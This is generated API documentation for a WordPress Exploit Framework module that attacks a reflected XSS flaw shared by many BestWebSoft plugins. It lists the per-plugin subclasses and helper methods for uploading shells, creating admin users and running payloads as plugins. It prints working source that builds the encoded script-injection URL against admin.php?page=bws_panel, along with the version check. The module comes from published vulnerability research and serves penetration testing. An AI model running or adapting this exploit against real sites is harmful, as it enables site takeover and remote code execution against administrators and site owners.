Class: Wpxf::Exploit::BwsPanelReflectedXssShellUpload

Inherits:

Module

• Object
• Module
• Wpxf::Exploit::BwsPanelReflectedXssShellUpload

Includes:

WordPress::ReflectedXss

Defined in:

lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb

Direct Known Subclasses

AdsensePluginReflectedXssShellUpload, BwsGoogleMapsReflectedXssShellUpload, BwsPortfolioReflectedXssShellUpload, CaptchaReflectedXssShellUpload, CarRentalReflectedXssShellUpload, ContactFormMultiReflectedXssShellUpload, ContactFormReflectedXssShellUpload, ContactFormtoDBReflectedXssShellUpload, CustomAdminPageReflectedXssShellUpload, CustomFieldsSearchReflectedXssShellUpload, CustomSearchReflectedXssShellUpload, DonateReflectedXssShellUpload, EmailQueueReflectedXssShellUpload, ErrorLogViewerReflectedXssShellUpload, FacebookButtonReflectedXssShellUpload, FeaturedPostsReflectedXssShellUpload, GalleryCategoriesReflectedXssShellUpload, GalleryReflectedXssShellUpload, GoogleAnalyticsReflectedXssShellUpload, GoogleCaptchaReflectedXssShellUpload, GooglePlusOneReflectedXssShellUpload, GoogleShortlinkReflectedXssShellUpload, GoogleSitemapReflectedXssShellUpload, HtaccessReflectedXssShellUpload, JobBoardReflectedXssShellUpload, LatestPostsReflectedXssShellUpload, LimitAttemptsReflectedXssShellUpload, LinkedInReflectedXssShellUpload, MultilanguageReflectedXssShellUpload, PDFPrintReflectedXssShellUpload, PaginationReflectedXssShellUpload, PinterestReflectedXssShellUpload, PopularPostsReflectedXssShellUpload, PosttoCSVReflectedXssShellUpload, ProfileExtraFieldsReflectedXssShellUpload, PromoBarReflectedXssShellUpload, QuotesandTipsReflectedXssShellUpload, RatingReflectedXssShellUpload, RealityReflectedXssShellUpload, ReattacherReflectedXssShellUpload, RelevantRelatedReflectedXssShellUpload, SMTPReflectedXssShellUpload, SenderReflectedXssShellUpload, SocialButtonsPackReflectedXssShellUpload, SocialLoginReflectedXssShellUpload, SubscriberReflectedXssShellUpload, TestimonialsReflectedXssShellUpload, TimesheetReflectedXssShellUpload, TwitterButtonReflectedXssShellUpload, UpdaterReflectedXssShellUpload, UserRoleReflectedXssShellUpload, VisitorsOnlineReflectedXssShellUpload

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary

• #check ⇒ Object
• #fixed_version ⇒ Object
• #initialize ⇒ BwsPanelReflectedXssShellUpload constructor

  A new instance of BwsPanelReflectedXssShellUpload.

• #plugin_name ⇒ Object
• #url_with_xss ⇒ Object
• #vulnerable_url ⇒ Object

Methods included from WordPress::ReflectedXss

#run

Methods included from WordPress::Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #run, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initialize ⇒ BwsPanelReflectedXssShellUpload

Returns a new instance of BwsPanelReflectedXssShellUpload.

# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 6

def initialize
  super

  update_info(
    name: 'Multiple BestWebSoft Plugins Reflected XSS Shell Upload',
    author: [
      'DefenseCode', # Discovery
      'rastating'    # WPXF module
    ],
    references: [
      ['WPVDB', '8796'],
      ['URL', 'http://www.defensecode.com/advisories/DC-2017-02-014_50_WordPress_plugins_by_BestWebSoft_Advisory.pdf']
    ],
    date: 'Apr 12 2017'
  )
end

Instance Method Details

#check ⇒ Object

# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 23

def check
  return :unknown if plugin_name.nil?
  return :vulnerable if fixed_version.nil?

  check_plugin_version_from_readme(plugin_name, fixed_version)
end

#fixed_version ⇒ Object

# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 34

def fixed_version
  nil
end

#plugin_name ⇒ Object

# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 30

def plugin_name
  nil
end

#url_with_xss ⇒ Object

# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 42

def url_with_xss
  "#{vulnerable_url}?page=bws_panel&category=%22%3E%3Cscript%3E#{xss_url_and_ascii_encoded_include_script}%3C%2Fscript%3E%3C%22"
end

#vulnerable_url ⇒ Object

# File 'lib/wpxf/modules/exploit/xss/reflected/bws_panel_reflected_xss_shell_upload.rb', line 38

def vulnerable_url
  normalize_uri(wordpress_url_admin, 'admin.php')
end